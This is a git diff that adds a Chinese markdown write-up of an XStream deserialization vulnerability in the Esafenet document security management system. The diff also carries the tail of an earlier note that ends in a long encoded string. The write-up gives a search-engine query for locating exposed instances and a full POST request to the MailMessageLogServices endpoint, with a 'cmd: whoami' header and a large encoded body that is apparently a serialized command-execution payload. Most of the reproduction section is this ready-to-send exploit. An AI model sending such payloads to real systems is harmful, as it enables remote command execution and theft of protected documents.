MODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706607230273-16b9d714-4e56-4cc6-a77b-349a68389d00.png](./img/y8FWroxGA2nCEQ2w/1706607230273-16b9d714-4e56-4cc6-a77b-349a68389d00-702061.png)
+
+
+
+> 更新: 2024-04-20 22:01:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zi1q4mnm7ecvd2vc>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统MailMessageLogServices存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统MailMessageLogServices存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..69754ae
--- /dev/null
+++ b/亿赛通电子文档安全管理系统MailMessageLogServices存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统MailMessageLogServices存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统MailMessageLogServices存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/DgrdPy_Vw0EsYXrS/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-303965.png)
+
+# 四、漏洞复现
+```java
+POST /CDGServer3/MailMessageLogServices HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: {hosname}
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLB